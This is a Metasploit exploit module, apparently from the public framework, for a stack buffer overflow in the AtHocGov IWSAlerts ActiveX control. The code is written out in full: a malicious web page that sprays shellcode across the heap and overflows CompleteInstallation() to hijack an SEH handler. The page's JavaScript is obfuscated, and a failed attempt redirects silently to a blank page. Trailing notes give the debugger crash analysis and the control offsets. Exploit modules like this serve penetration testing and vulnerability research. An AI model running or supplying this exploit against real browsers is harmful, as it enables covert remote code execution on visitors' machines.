##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
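class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Browser exploit for the AtHocGov IWSAlerts toolbar control (AtHocGovTBr.dll
  # 6.1.4.36). The served page instantiates 'AtHocGovGSTlBar.GSHelper.1', sprays
  # the heap with the payload at 0x0a0a0a0a and then hands an overlong string to
  # CompleteInstallation(). Execution is diverted through the heap spray, so the
  # target's 'Ret' entry is an empty placeholder that nothing in this module reads.
  #
  # The trailing =begin/=end notes record the crash analysis: the DLL is built
  # with /GS and has a SafeSEH table, and the overflow reaches an exception
  # registration record at offset 4680. Overwriting the handler with a heap
  # address (outside any loaded image) is presumably what sidesteps both
  # mitigations on the listed XP/Vista + IE6/IE7 targets -- verify before
  # relying on other platforms.
  #
  # Reliability, Stability and SideEffects are declared UNKNOWN; a failed attempt
  # runs inside the browser process, so operators should expect the possibility
  # of a visible IE crash rather than a silent failure.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AtHocGov IWSAlerts ActiveX Control Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in AtHocGov IWSAlerts. When
          sending an overly long string to the CompleteInstallation() method of AtHocGovTBr.dll
          (6.1.4.36) an attacker may be able to execute arbitrary code. This
          vulnerability was silently patched by the vendor.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'MC' ],
        'References' => [
          [ 'OSVDB', '94557' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Payload' => {
          # Upper bound on the encoded payload replicated by the heap spray.
          'Space' => 1024,
          'BadChars' => "\x00",
        },
        'Platform' => 'win',
        'Targets' => [
          # 'Ret' is intentionally empty: control flow goes into the sprayed
          # heap, not to a fixed address in a loaded module.
          [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]
        ],
        'DisclosureDate' => '2008-02-15',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ])
      ]
    )
  end

  # Opt out of automatic module selection (e.g. browser autopwn-style
  # filtering); this exploit is only launched when chosen explicitly.
  def autofilter
    false
  end

  # Declare the zlib dependency up front (use_zlib is the framework's
  # dependency check; presumably needed by the HTTP server mixin).
  def check_dependencies
    use_zlib
  end

  # Build and send the exploit page for one client connection.
  #
  # @param cli connected browser client; used to regenerate the payload, to
  #   send the response and to hand off to the payload handler
  # @param request the incoming HTTP request; every URI under URIPATH receives
  #   the same page, so it is not inspected
  def on_request_uri(cli, request)
    # Re-generate the payload for this client; nothing to serve if that fails.
    return if regenerate_payload(cli).nil?

    # Shellcode as %uXXXX escapes so JavaScript unescape() can rebuild it.
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # 'or cl,[edx]' assembles to the two bytes 0a 0a; doubled and URI-encoded it
    # is the 4-byte filler 0x0a0a0a0a written over the exception record (see the
    # trailing notes: control at offsets 4680/4684). It equals the spray address
    # below, so the clobbered handler presumably resolves into sprayed shellcode.
    ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or cl,[edx]").encode_string * 2)

    # 12500 iterations x 4 bytes = 50,000 bytes of filler, well past the
    # 4680-byte offset noted in the crash analysis. Any script error redirects
    # to about:blank so a failed attempt leaves nothing on screen.
    js = %Q|
    try {
      var evil_string = "";
      var index;
      var vulnerable = new ActiveXObject('AtHocGovGSTlBar.GSHelper.1');
      var my_unescape = unescape;
      var shellcode = '#{shellcode}';
      #{js_heap_spray}
      sprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000);
      for (index = 0; index < 12500; index++) {
        evil_string = evil_string + my_unescape('#{ret}');
      }
      vulnerable.CompleteInstallation(evil_string);
    } catch( e ) { window.location = 'about:blank' ; }
    |

    # Randomise identifiers and string literals; memory_sensitive is intended
    # to keep the obfuscator from rewrites that would perturb the heap layout
    # the spray depends on.
    opts = {
      'Strings' => true,
      'Symbols' => {
        'Variables' => [
          'vulnerable',
          'shellcode',
          'my_unescape',
          'index',
          'evil_string',
        ]
      }
    }
    js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
    js.update_opts(js_heap_spray.opts)
    js.obfuscate(memory_sensitive: true)
    content = %Q|
<html>
<body>
<script><!--
#{js}
//</script>
</body>
</html>
|

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end
end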
=begin
IDL info...
[id(0x00000022)]
HRESULT CompleteInstallation([in] BSTR strParam);
$~/trunk/./msfpescan -f AtHocGovTBr.dll
AtHocGovTBr.dll: Microsoft Visual C++ v7.1 EXE [165]
AtHocGovTBr.dll: Microsoft Visual C++ v7.1 DLL [159]
// smash /GS
$~/trunk/./msfpescan -i AtHocGovTBr.dll | grep SecurityCookie
SecurityCookie 0x4278193c
// /SafeSEH, not today.
$~/trunk/./msfpescan -i AtHocGovTBr.dll | grep SEH
SEHandlerTable 0x42774e40
SEHandlerCount 0x0000021b
0:000> !exchain
0013cae0: ntdll!_except_handler3+0 (7c90ee18)
CRT scope 0, filter: ntdll!RtlFreeHeap+613 (7c93bec5)
func: ntdll!RtlFreeHeap+617 (7c93bece)
0013cb1c: AtHocGovTBr!SetOfflineInstall+a0b4 (4274f944)
0013dd9c: 61473161
Invalid exception stack at 47306147
0:000> !pattern_offset 5140 0x47306147
[Byakugan] Control of 0x47306147 at offset 4680.
0:000> !pattern_offset 5140 0x61473161
[Byakugan] Control of 0x61473161 at offset 4684.
=end